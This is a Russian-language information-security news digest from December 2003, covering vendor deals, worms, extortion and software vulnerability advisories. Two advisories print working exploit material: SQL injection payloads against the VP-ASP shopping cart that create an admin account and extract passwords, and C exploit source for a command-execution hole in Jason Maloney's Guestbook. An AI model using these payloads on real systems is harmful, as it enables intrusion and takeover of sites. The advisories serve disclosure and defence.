Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Новая бизнес-инициатива «Лаборатории Касперского»: защита от хакеров для каждого нового российского компьютера
3 декабря | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Первое соглашение об установке Kaspersky® Anti-Hacker на российские компьютеры подписано с Rover Computers.
«Лаборатория Касперского», ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает о расширении сотрудничества с группой компаний Rover Computers, одним из ведущих российских производителей компьютерной техники и аксессуаров. В дополнение к заключенному ранее соглашению о включении OEM-версии Антивируса Касперского® Lite в комплект поставки всех компьютеров производства Rover Computers, теперь 100% выпускаемых компанией ноутбуков будут поставляться клиентам с предустановленной системой защиты от хакерских атак на основе популярной в России и за рубежом программы Kaspersky® Anti-Hacker. Помимо этого, антивирусная составляющая системы защиты компьютеров Rover также усилилась за счет замещения поставлявшейся до настоящего момента ОЕМ-версии Антивируса Касперского® Lite на более эффективный продукт «Лаборатории Касперского» — Антивирус Касперского® Personal ОЕМ.
Программа Kaspersky® Anti-Hacker представляет собой персональный межсетевой экран, обеспечивающий полномасштабную защиту компьютера, работающего под управлением операционной системы Windows, от несанкционированного доступа к данным, а также от сетевых хакерских атак из локальной сети или интернета. Благодаря контролю всех сетевых операций на компьютере (отслеживание активности приложений, имеющих доступ в интернет; пакетная фильтрация входящих и исходящих данных и пр.) Kaspersky® Anti-Hacker также обеспечивает конфиденциальность всех хранящихся на ПК данных.
В то же время включение OEM-версии Антивируса Касперского® Personal в комплект предустановленного программного обеспечения существенно расширит возможности владельцев новых компьютеров Rover в области защиты от вредоносных кодов. Помимо встроенной функции защиты интернет-соединений и обнаружения скрипт-вирусов в режиме реального времени, Антивирус Касперского® Personal обеспечивает комплексную проверку электронной почты, а встроенный планировщик задач позволит полностью автоматизировать работу системы антивирусной безопасности. Более того, внедрение в программу передовой разработки «Лаборатории Касперского» — технологии iChecker™, многократно повысит эффективность сканирования файловой системы и оптимизирует нагрузку на вычислительные мощности компьютера, тем самым экономя время и высвобождая ресурсы для работы исполняемых приложений.
«Укрепление сотрудничества с Rover Computers отражает возрастание роли информационной безопасности в технологической политике компаний — производителей компьютерной техники. Особенно важное значение фактор защиты от внешних угроз имеет для переносных компьютеров. Они часто используются сотрудниками вне корпоративной сети организации во время командировок и, следовательно, в наибольшей степени подвержены хакерским атакам и проникновению вирусов. Данная инициатива компании Rover Computers предоставит покупателям изначально защищенный ноутбук, что обеспечит безопасность при установке новых программ и приложений, в том числе и через интернет», — отметил директор российского офиса «Лаборатории Касперского» Гарри Кондаков.
«Решение о комплектации техники RoverBook продуктом Kaspersky Anti-Hacker явилось логичным продолжением сотрудничества наших компаний. Теперь покупатели ноутбуков этой марки получат полноценную защиту не только от вирусной угрозы, но и от хакерских атак», — сказал Андрей Борисов, заместитель генерального директора подразделения персональных компьютеров компании Rover Computers.
О группе компаний Rover Computers
Rover Computers — группа компаний со 100% российским капиталом. Специализируется на производстве высокотехнологичного оборудования: компьютеров и периферии. Выпускает ноутбуки под торговой маркой RoverBook (с 1995 г.), компьютеры RoverPC, мониторы RoverScan и компьютеры-моноблоки со встроенным ЖК-экраном WindRover. По итогам 2001 года RoverBook является лидером российского рынка портативных компьютеров, RoverScan входит в пятерку лидеров российского рынка мониторов. В 2002 году производство было сертифицировано на соответствие международному стандарту качества ISO 9001-2001.
О «Лаборатории Касперского»
«Лаборатория Касперского» — международная компания-разработчик
программного обеспечения для защиты от вирусов, хакеров и спама. Продукты
компании предназначены для широкого круга клиентов — от домашних пользователей
до крупных корпораций. В активе «Лаборатории Касперского» 14-летний опыт
непрерывного противостояния вирусным угрозам, позволивший компании накопить
уникальные знания и навыки и стать признанным экспертом в области создания
систем антивирусной защиты.
Антивирус Касперского® расширяет возможности легендарного прокси-сервера WinGate
3 декабря | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.«Лаборатория Касперского», ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, и компания Qbik (www.qbik.com), производитель программных продуктов для работы с компьютерными сетями, представляют антивирусную систему для одного из наиболее популярных продуктов для распределенного подключения к интернету — WinGate. Система построена на основе Антивируса Касперского®, который стал первой технологией защиты от вирусов, выбранной Qbik для совместной поставки со своими продуктами.
Сегодня WinGate — это современный и удобный в использовании программный пакет для управления сетевыми подключениями. Решение обеспечивает связь с интернет, буферизацию полученных из сети данных и имеет интегрированные средства защиты от несанкционированного проникновения (межсетевой экран). Богатые возможности WinGate определили заслуженную популярность этого пакета — сегодня число его пользователей во всем мире превышает 10 млн. Теперь функциональные возможности этого программного комплекса дополнены полномасштабной системой антивирусного сканирования от «Лаборатории Касперского».
Антивирус Касперского® предлагается пользователям WinGate в качестве дополнительной опции и обеспечивает полным набором функций, необходимых для эффективного противостояния всем видам вредоносных программ. Программа в масштабе реального времени производит сканирование входящего трафика на наличие вирусов, включая почтовую корреспонденцию, web-страницы и данные, передаваемые по протоколам FTP и HTTP.
Встроенная в Антивирус Касперского® функция карантина позволяет администратору изолировать зараженные объекты, тем самым предотвращая дальнейшее распространение вредоносного кода. Специальная система просмотра содержимого карантинного блока может предоставить информацию обо всех свойствах вируса: тип, источник заражения (включая информацию об инициировавшем распространение пользователе), и вид операции, выполняемой вирусом в момент его обнаружения.
«Наша основная цель — обеспечивать не только удобную и бесперебойную, но и безопасную работу пользователей WinGate. С внедрением Антивируса Касперского®, одного из наиболее эффективных и надежных средств защиты от вредоносных программ на международном рынке, пользователи WinGate смогут забыть о вирусной угрозе», — сказал Эдриен де Крой (Adrien de Croy), генеральный директор Qbik.
«Одним из основных направлений деятельности «Лаборатории Касперского» является технологическое сотрудничество с ведущими разработчиками программных продуктов. Мы уверены в том, что интеграция Антивируса Касперского® в популярный программный комплекс WinGate позволит усилить рыночные позиции обоих участников данного проекта, а также значительно повысить качество антивирусной защиты пользователей WinGate», — отметил Виталий Безродных, коммерческий директор «Лаборатории Касперского».
О «Лаборатории Касперского»
«Лаборатория Касперского» — международная компания-разработчик программного обеспечения для защиты от вирусов, хакеров и спама. Продукты компании предназначены для широкого круга клиентов — от домашних пользователей до крупных корпораций. В активе «Лаборатории Касперского» 14-летний опыт непрерывного противостояния вирусным угрозам, позволивший компании накопить уникальные знания и навыки и стать признанным экспертом в области создания систем антивирусной зашиты.
О компании Qbik
Основанная в 1995 г., Qbik является частной компанией-разработчиком, специализирующейся на создании программных комплексов для работы с интернетом и защиты данных. Qbik предлагает спектр продуктов для распределенного доступа в интернет (WinGate), соединения удаленных офисов (WinGate VPN) и защиты данных (NetPatrol).
Wingate был первым прокси-решением для подключения к интернету на базе
Microsoft Windows, который позволяет обеспечить доступ в интернет через один
канал связи сразу для нескольких пользователей.
W32/Mimail-L - месть спамеров
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныОрганизации по борьбе со спамом стали жертвами нового интернет-червя. Эксперты полагают, что червь W32/Mimail-L является делом рук мстительных спамеров, которые стремятся парализовать работу организаций по борьбе с потоком несанкционированных электронных сообщений. "Это уже третья разновидность вируса Mimail, которая к нам поступила, только на этот раз червь активнее", - сказал Стив Линфорд, основатель Spamhaus Project, британской группы, которая занимается поиском отправителей электронного мусора.
Согласно данным антивирусной компании Sophos, червь Mimail-L находится в прикрепленном файле, который приходит на электронный адрес получателя от женщины по имени Венди, предлагающей ознакомиться с несколькими своими эротическими фотографиями. Вирус активизируется при попытке открыть вложенный файл, после чего автоматически рассылает себя по всем найденным адресам. Червь превращает компьютер пользователя в "зомби", управляемый извне и начинающий отправлять бесконечный поток фальшивых сообщений на один из сайтов в интернете, например, на сервер Spamhaus с целью организации DDoS-атаки.
Еще одной пакостью, придуманной авторами вируса, является электронное сообщение, приходящее на адрес жертвы, которой сообщается, что компьютерный диск с якобы заказанной пользователем детской порнографией будет доставлен на его почтовый адрес, а соответствующая сумма будет списана со счета. "В случае, если Вы хотите аннулировать заказ или у вас есть какие-либо претензии, просим писать на следующий адрес", - любезно предлагают мошенники. В качестве адреса дается адрес почты одной из восьми антиспамерских организаций.
Линфорд полагает, что червь написан программистами одной из трех спамерских банд, которые в прошлом уже совершали DDoS-атаки на сервер его организации. "Эти ребята пишут трояны, совершают атаки на серверы и зарабатывают на воровстве номеров кредитных карт", - считает г-н Линфорд.
В последнее время борьба между спамерами и антиспамерами вступила в активную фазу по мере того, как организации, борющиеся с потоком ненужных электронных сообщений, вычисляют наиболее активных спамеров, создают черные списки адресов и передают их провайдерам интернет-услуг, которые блокируют любые сообщения, поступающие с этих адресов в ящики пользователей.
210 декабря Северо-Кавказский технический университет откроет региональный центр по подготовке и переподготовке специалистов в области защиты информации
3 декабря | Рубрика: События, семинары, конференции, даты10 декабря Северо-Кавказский технический университет откроет региональный центр по подготовке и переподготовке специалистов в области защиты информации.
Как сообщают в пресс-службе губернатора Ставропольского края, в настоящее время при университете создана и действует региональная лаборатория по исследованию проблем защиты информации, которая является одной из лучших в России. Университет также выиграл тендер на проведение Всероссийского семинара по проблемам подготовки кадров в области информационной безопасности автоматизированных систем. Семинар предположительно состоится 10–11 декабря. "Дальнейшая результативная деятельность коллектива в данном направлении может способствовать созданию на базе университета аналогичного Всероссийского центра", - отмечает представитель пресс-службы.
3Американские ИТ пользуются спросом у шпионов
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность бизнесаКомпании из 75 стран мира в 2001 году пытались похитить технологические и промышленные секреты у американских фирм. По оценкам Американского общества промышленной безопасности (American Society for Industrial Security), ущерб от действий промышленных шпионов составил $59 млрд. Эти данные опубликованы в только что рассекреченном докладе контрразведки США, подготовленном для Конгресса США.
Чаще всего промышленные шпионы стараются внедрить своего человека в компанию-обладателя технологических секретов, подкупить осведомленного сотрудника, либо приобрести новый образец изделия, чтобы попытаться разобраться в технологии его изготовления. Фиксируется все больше попыток получить информацию через интернет: промышленные шпионы активно анализируют содержимое корпоративных сайтов и часто пытаются взломать их, чтобы получить доступ к внутренним базам данных. Наибольшая угроза исходит от компаний, с которыми у фирмы-обладателя технологии налажены бизнес-связи.
Наибольший интерес у промышленных шпионов вызывает информация о новых разработках в сфере информационных технологий (30% от общего числа попыток краж), сенсоры и лазеры (20%), военные технологии (14%) и технологии в сфере аэронавтики (11%).
4В Японии арестованы пользователи файлообменных сетей
3 декабря | Рубрика: Регулирование: Законы, постановления, сертификация, контрольВ Японии арестованы два пользователя файлообменной сети Winny, создатели которой гарантировали свои клиентам анонимность, сообщает CNET Asia. Кроме того, полиция провела обыск в доме самого разработчика Winny.
Сеть Winny действует на базе более известной сети Freenet и предлагает свои услуги почти 250 тысячам пользователей. Главным ее отличием от Kazaa и других аналогичных сетей является полная анонимность пользователей. Полицейские не уточнили, каким образом им удалось выйти на задержанных любителей обмена файлами, и что послужило основанием для их ареста. В большинстве стран потребителям услуг файлообменных сетей приходится становиться ответчиками по гражданским искам.
Возраст арестованных составляет 41 год и 19 лет. 41-летнему пользователю среди прочих правонарушений инкриминируется незаконное распространение копий фильма "Игры разума" (A Beautiful Mind), а его 19-летнему подельнику в вину вменяют представление в открытом доступе игры Super Mario Advance. В числе истцов по делу японских пользователей файлообменных сетей выступают несколько компаний, в частности, Nintendo.
Наступление на пользователей файлообменных сетей проводится также в Республике Корея и на Тайване. Тайваньское правосудие уже ведет дело против троих пользователей, корейские власти пока только намереваются привлечь к ответственности несколько человек.
5ВНИМАНИЕ кардерам!
3 декабря | Рубрика: Регулирование: Законы, постановления, сертификация, контрольАдминистрация платежной системы ASSIST начала сотрудничать с Отделом "К"
Министерства Внутренних Дел республики Татарстан. Совместными усилиями они будут
ловить карточных мошенников.
Между сторонами предполагается обмен
информацией с целью оказания системой ASSIST помощи в выявлении, так называемых,
кардеров, а также совместные усилия по предотвращению мошенничества. В самой
ASSIST не считают, что такими действиями они нарушают права своих клиентов.
"Нарушением приватности это не является, так как, во-первых, информация
является конфиденциальной и органами внутренних дел не распространяется. Запрос
на нее выдается на основании п.4, п.30, ст.11 ФЗ "О милиции" и в соответствии со
ст.6,п.5 ст.15 ФЗ "Об оперативно-розыскной деятельности", - отметила
руководитель отдела PR и маркетинга ООО "Ассист" Марина Исаева.
В
компании заявляют, что открыты к сотрудничеству с другими силовыми структурами.
"ASSIST - приобретает возможность первым быть в курсе действий, которые
предпринимаются правоохранительными органами для предотвращения
интернет-мошенничества", - отмечается в распространенном пресс-релизе.
6
Шантаж в киберпространстве
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныГруппировки, работающие с территории Восточной Европы, провели серию атак на
корпоративные компьютерные сети, которые принесли компаниям миллионные убытки и
сделали их уязвимыми для шантажа.
Последние случаи взлома сайтов с целью
шантажа зафиксированы в Великобритании. Сейчас Национальное подразделение по
борьбе с преступностью в сфере высоких технологий (National Hi-Tech Crime Unit,
или NHTCU) расследует взлом сайта, руководство которого получило ультиматум:
заплатить несколько десятков тысяч фунтов или подвергнуться новому нападению.
«К настоящему моменту мы расследовали шесть случаев, но, на самом деле,
их во много раз больше, и так как они происходят не только в Соединенном
Королевстве, то это, по всей видимости, международная проблема. Хакеры атакуют
высоко загруженные и не очень дорогие бизнес-сайты», - объяснил Ян Моррис,
основатель компании Equip Technology и специалист по компьютерной безопасности.
Для проведения атаки преступники используют сотни компьютеров, обрушивая
на сервер жертвы поток ложных запросов. Огромный трафик приводит к перегрузке
сервера, который не в состоянии удовлетворить настоящие запросы на проведение
онлайновых транзакций. В результате из-за простоя одна из британских компаний
потеряла только за день около $1,66 млн., а в сентябре были выведены из строя
более десятка американских сайтов азартных игр.
Теперь, по всей
видимости, тактика шантажа получает все большее распространение. Владельцам
сайтов предлагают заплатить суммы до $50 тыс., чтобы обезопасить себя от атак на
год. Полиция призывает жертв не поддаваться шантажу и сообщать о преступлениях.
«Это вымогательство. Смысл таков: вы нам платите, а мы оставляем вас в покое.
Если требуемая сумма не превышает $40-50 тыс., то, по сравнению с убытками,
которые несут компании, им кажется привлекательным заплатить и надеяться на то,
что атака не повторится», - отмечает Мик Дитс, руководитель операций в NHTCU,
добавляя, что гарантий прекращения атак нет.
7
США против контроля за Интернет
3 декабря | Рубрика: Информационные ресурсы«США известно о попытках ряда стран мира расширить государственный контроль за
Интернет», - заявил координатор госдепартамента США по международным
коммуникациям и информационной политике Дэвид Гросс.
В интервью
телекомпании «Фокс» Гросс сообщил, что администрация Джорджа Буша будет всячески
бороться с попытками подчинить Интернет государственному контролю, включая
попытки поставить его под контроль ООН.
Дэвид Гросс возглавит делегацию
правительства США на международном саммите информационного сообщества в Женеве,
который будет проходить под эгидой ООН в период с 10 по 12 декабря 2003 года.
По данным телекомпании «Фокс» на саммите может быть предпринята попытка
переподчинить Интернет специально созданному органу ООН для унификации
стандартов мировой компьютерной «паутины» и повышения эффективности средств ее
защиты.
За такое решение выступают Китай, Сирия, Египет, Вьетнам и Южная
Африка. Не исключено также, что оно может быть поддержано Россией, Индией,
Саудовской Аравией и Бразилией. Противники подобного шага опасаются, что за
попытками усилить международное и государственное управление Интернет скрываются
намерения поставить под контроль находящуюся в нем информацию.
В
настоящее время головной организацией Интернет является международная
бесприбыльная частная корпорация ICANN, штаб-квартира которой расположена в
штате Калифорния.
8
SQL инъекция в VP-ASP shopping cart
3 декабря | Рубрика: Дыры и патчи программ и операционных сред
Программа: VP-ASP 5.0 Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе. Уязвимость SQL инъекции обнаружена в 'shopsearch.asp' и 'shopdisplayproducts.asp' сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной сисемы. Пример/Эксплоит: -- PoC code 1: Платформы: Win32/MSSQL Posting this data to shopsearch.asp creates new administrative account Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6 Posting this data to shopsearch.asp changes admin password Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 -- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability will allow remote attacker to read any information from a database. -- PoC code 2: Платформы: Win32/MSSQL http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select% 20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and% 20fldpassword%20like%20'a%25'-- changing value at the end of request %20'a%25'-- %20'b%25'-- %20'c%25'-- ... and looking through the HTTP response from VP-ASP web server attacker can find the admin password. URL производителя:http://www.vpasp.com Решение: Установите обновленную версию программы: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm |
Дирекция Форума "Технологии безопасности" и Компания "Гротек" выпускают путеводитель"Технологии безопасности"
3 декабря | Рубрика: Информационные ресурсыПутеводитель "Технологии безопасности", изданный тиражом 15 000 экземпляров, будет бесплатно распространяться среди посетителей Форума "Технологии безопасности": на стойке регистрации, на информационных стендах, в пресс-центре, на территории выставочного павильона, на конференциях и семинарах, проводимых в рамках выставки, на стендах участников бюллетеня.
В "Официальном путеводителе форума "Технологии безопасности" будет размещена следующая информация:
- официальные материалы Форума;
- подробный план экспозиций;
- программа конференций и семинаров;
- программа показательных выступлений и шоу-программ;
- обзор новинок, анализ оборудования и технологий, представляемых компаниями на Форуме;
- аналитическая, практическая, официальная информация, статистические данные отрасли и др.
Международный Форум «Технологии безопасности» - крупное выставочное мероприятие в России, странах СНГ и Восточной Европы. Более двадцати пяти тысяч специалистов (силовые структуры, проектно-монтажные, торговые организации, службы безопасности аэропортов, гостиниц, банков и др.) знакомятся на Форуме с новейшими отечественными и зарубежными разработками в сфере безопасности. Актуальное содержание "Официального путеводителя форума "Технологии безопасности" сделает его не только необходимым каждому посетителю непосредственно на Форуме, но и полезным для специалистов в послевыставочный период.
Источник: пресс-релиз Форума "Технологии безопасности"
10Выполнение произвольных команд в Jason Maloney Guestbook
3 декабря | Рубрика: Дыры и патчи программ и операционных сред
Программа: Jason Maloney Guestbook 3.0 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Jason Maloney's Guestbook. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может послать специально сформированный POST запрос, чтобы выполнить произвольные команды на целевой системе. Пример/Эксплоит: /* Jason Maloney's Guestbook CGI vulnerability PoF. * * Discovered and written by shaun2k2 - shaunige@yahoo.co.uk. * * A few things in the HTTP headers WILL need to be changed appropriately to custom values for this exploit to WORK. * * Greets to: rider, maveric, sw0rdf1sh, liquidfish, pc_the_great, peter, rizzo, theclone, msViolet, Kankraka, deadprez, hades, the p0pe, port9, Dr Frankenstein, and whitedwarf. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define PORT 80 int main(int argc, char *argv[]) { if(argc < 2) { printf("Jason Maloney's CGI Guestbook Exploit.\n"); printf("Discovered and written by shaun2k2 - shaunige@yahoo.co.uk\n"); printf("\nUsage: %s <host>\n", argv[0]); exit(-1); } int sock; printf("- Preparing exploit buffer.\n"); char http_request[] = "POST /guestbook/guest.cgi HTTP/1.1" "Host: localhost" "User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.2) Gecko/20021205" "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1" "Accept-Language: en-us,en;q=0.5" "Accept-Encoding: gzip,deflate" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" "Keep-Alive: 300" "Connection: keep-alive" "Referer: http://localhost/guestbook/add.html" "Content-Type: application/x-www-form-urlencoded" "Content-Length: 111" "name=dgf&email=shaunige@yahoo.co.uk&url=http%3A%2F% 2Fdfg&city=dfg&state=dfg&country=USA&comments=dfg&mailprog=evilprog&x=15&y=20"; struct sockaddr_in dest; struct hostent *he; if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve hostname!\n"); exit(-1); } if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(-1); } dest.sin_family = AF_INET; dest.sin_addr = *((struct in_addr *)he->h_addr); dest.sin_port = htons(PORT); printf("[!] Connecting.\n"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { perror("connect()"); exit(-1); } printf("[+] Connected!\n"); printf("[*] Sending exploit buffer.\n"); send(sock, http_request, strlen(http_request), 0); sleep(1); printf("[*] Exploit buffer sent!\n"); sleep(1); close(sock); printf("[!] Disconnected.\n"); return(0); URL производителя: http://www.aestheticsurgerycenter.com/scripts/guestbook/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Автономный однодверный контроллер EntryProx от компаний HID (США) и Northern Computers (США)
3 декабря | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Если воспользоваться автономным однодверным контроллером EntryProx от компаний HID (США) и Northern Computers (США), то можно организовать систему контроля доступа с помощью только одного этого устройства. EntryProx - это готовая система со встроенными кодонаборной клавиатурой, кнопкой выхода и считывателем прокс-карт, антенну которого можно вынести на расстояние до 3 м от контроллера.
EntryProx прост в установке и обслуживании. Корпус EntryProx погодо - и влагозащищенный. Безупречная репутация компаний HID и Northern Computers гарантирует надежность устройства. Система имеет сертификат ГОСТ Р.
Варианты установки:
- Экономичный вариант. Доступ осуществляется только по прокс-карте. Антенна считывателя выносится за пределы контроллера и устанавливается при входе в помещение. Выход с помощью кнопки выхода, расположенной на EntryProx.
- Вариант усиленного режима доступа. Осуществляется по прокс-карте и коду одновременно. Контроллер находится при входе. Выход по дополнительной кнопке.
- EntryProx в качестве считывателя в составе системы контроля и управления доступом Northern Computers.
Подробнее познакомиться с контроллером можно на сайте фирмы "Интегратор".
Источник: пресс-релиз фирмы "Интегратор"
12С 04.12.2003 по 06.12.2003, в городе Ставрополе, пройдет выставка "Охрана. Безопасность. Связь"
3 декабря | Рубрика: События, семинары, конференции, даты Информационные ресурсыКраткая информация о выставке:
3-я специализированная выставка систем безопасности, средства связи, программные технологии защиты информации. Таможня. Страховые компании. Техника безопасности. Охрана жизнедеятельности.
Организатор: Выставочный центр "Прогресс"
Более полную информацию о выставке Вы можете посмотреть здесь.
13В Северной Корее открылась «безопасная» email служба
3 декабря | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность общественной коммуникации, личности.Северная Корея открыла службу email, которая «гарантирует неприкосновенность корреспонденции», хотя маловероятно, чтобы в этой стране у кого-то, кроме мизерной кучки людей, вообще был доступ к интернету.
Скупое на подробности сообщение поступило от официального северокорейского агентства новостей Korean Central News Agency, которое само работает через веб-сайт с японским доменом. Как и страна в целом, северокорейский онлайн остается сугубо закрытым.
В сообщении говорится, что «служба email гарантирует неприкосновенность корреспонденции благодаря системе сетевой защиты», хотя никаких технических деталей в нем не содержится. Там есть слова «a large transmission ban», которые, по всей вероятности, относятся к высокоскоростному каналу связи. Система установлена в Международном центре связи Северной Кореи, и доступ к ней можно получить бесплатно по местным телефонным линиям. Как много в Северной Корее пользователей интернета или даже пользователей компьютеров, остается только гадать, хотя в сообщении телеграфного агентства Associated Press о новой службе email говорится, что их, по всей видимости, очень мало. Известно, что в онлайне бывает лидер страны Ким Чен Ир, который то и дело упоминает о важности компьютерной технологии. Иностранные гости могут подключать свои компьютеры по международным телефонным линиям в нескольких северокорейских отелях и в интернет-кафе, недавно открытом в Пхеньяне. Одно время ходили слухи о хорошо обученных северокорейских хакерах, атакующих Южную Корею. В сообщении Associated Press говорится, что в 2001 году шесть южнокорейских активистов были арестованы за несанкционированный правительством обмен электронными сообщениями с официальными представителями Северной Кореи. Южнокорейцам по сей день запрещено без разрешения обмениваться сообщениями email с северными соседями.
14Введены три дополнительные номинации Национальной Премии по Безопасности
3 декабря | Рубрика: События, семинары, конференции, даты Информационные ресурсыСо дня официального объявления о старте Национальной премии по безопасности
организаторам поступали предложения от участников рынка безопасности по
расширению списка номинаций Премии. Все поступившие предложения по номинациям
рассмотрены на заседании учредителей Премии 1 декабря 2003 года.
По
итогам заседания принято решение о пополнении списка следующими номинациями:
Организаторы Премии приглашают к участию в конкурсе все компании, работающие на российском рынке безопасности, в том числе по новым номинациям.
С уважением,
Пресс-центр Национальной Премии по безопасности
Небезопасное создание временных файлов в HP-UX shar(1)
3 декабря | Рубрика: Дыры и патчи программ и операционных средПрограмма: HP-UX 11.00, B.11.04, и B.11.11
Опасность:
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в HP-UX shar(1) утилите. Локальный пользователь может получить поднятые привилегии.
Утилите shar(1) создает временные файлы с предсказуемыми именами в '/tmp' директории. В результате удаленный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе с root привилегиями.
URL производителя: http://www.hp.com/
Решение: Установите следующие исправления:
PHCO_29010 B.11.11 PHCO_29697 B.11.04 PHCO_28954 B.11.00http://itrc.hp.com 16
DoS против Sun Fire B1600 Blade System
3 декабря | Рубрика: Дыры и патчи программ и операционных сред
Программа: Sun Fire B1600 Blade System Опасность: Низкая Наличие эксплоита: Да Описание: Отказ в обслуживании обнаружен в Sun Fire B1600 Blade System Chassis. Удаленный пользователь может временно блокировать пакеты. Удаленный пользователь может послать ARP пакеты к Sun Fire B1600 10/100/1000BASE-T Network Management Port, чтобы временно заблокировать все порты на коммутаторе. URL производителя: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57430 Решение:Установите патч 114783-03 или более поздний для Sun Fire B1600 Blade System Chassis |
"Гротек" организует редакционный совет журнала "Информационная безопасность"
3 декабря | Рубрика: События, семинары, конференции, даты Информационные ресурсыСодержание журнала "Информационная безопасность", пилотный номер которого компания "Гротек" выпускает уже в декабре 2003 года, должно формироваться самими производителями, реселлерами и системными интеграторами, - считают издатели журнала.
Журнал "Информационная безопасность" выпускается в интересах участников рынка и на их средства. Поэтому для формирования содержания журнала принято решение организовать редакционный совет из наиболее авторитетных представителей компаний, работающих на российском рынке информационной безопасности и заинтересованных в развитии рынка в целом.
Первое заседание редакционного совета журнала "Информационная безопасность" состоится 18 декабря 2003 года. На нем будет обсуждаться тематический план журнала, внесение изменений и дополнений в тематический план, а также кандидатуры экспертов, предложенные членами редсовета.
За дополнительной информацией просьба обращаться к координатору проекта - Сергею Тимохову по тел. +7(095)251-6845, e-mail timokhov@groteck.ru
Источник: пресс-релиз компании "Гротек"
18Хакеры взломали одноразовую фотокамеру
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныВ середине августа компания Ritz Camera Centers вышла на рынок с одноразовыми цифровыми фотоаппаратами Dakota Digital стоимостью около 11 долл. США. Для получения снимков пользователям таких устройств нужно было отправить камеру в один из специализированных сервисных центров, в котором изображения извлекались из памяти, распечатывались или записывались на компакт-диск и высылались обратно по указанному адресу. На днях стало известно, что хакерам удалось "взломать" защиту Dakota Digital: теперь посредством специальных программных средств закачать снимки в компьютер можно, что называется, в домашних условиях - для связи с ПК применяется интерфейс USB.
Одноразовые фотоаппараты Dakota Digital комплектуются двухмегапиксельными матрицами, памятью на 25 кадров и вспышкой. Причем заряда батареи должно хватить примерно на 100 изображений. Фокусное расстояние камеры составляет 45 мм в пересчете на 35-миллиметровый эквивалент. При этом, по заявлению производителя, качество полученных снимков сравнимо с качеством фотографий, сделанных устройствами ценой в 200, а то и 250 долларов США. Таким образом, благодаря стараниям хакеров владельцы Dakota Digital получили в свои руки вполне приличный цифровик за смешную цену. Компания-производитель пока никак не отреагировала на информацию о взломе.
19Пираты украли новую "операционку" Microsoft
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныКопии программы под кодовым названием Longhorn найдены в городе Джохор Бару на юге Малайзии. Купить Longhorn можно за два доллара.
Как заявили Би-би-си представители компьютерной промышленности, это самый дерзкий выпад компьютерных пиратов за последнее десятилетие.
Программа Longhorn придет на смену Windows XP. Официально новинка поступит на прилавки не раньше начала 2005 года. По мнению экспертов, представление Longhorn станет самым значительным событием в этом секторе экономики за 10 лет.
Малазийские компьютерные пираты считаются одними из самых дерзких в мире. Копии голливудских фильмов, записанные на компакт-диски, появляются в Малайзии задолго до официальной премьеры.
Пресс-секретарь Microsoft заявил Би-би-си, что всего было найдено около 8 тысяч копий Longhorn. Считается, что операционная система попала к пиратам после проведенной в октябре этого года в Лос-Анджелесе компьютерной конференции.
Сама программа находится еще на ранней стадии разработки, так называемой стадии "пре-альфа". Как говорят в Microsoft, если кому-то придет в голову поставить нестабильную программу на домашний компьютер, это может обернуться большими проблемами.
20Локальное переполнение буфера в Linux ядре
3 декабря | Рубрика: Дыры и патчи программ и операционных сред
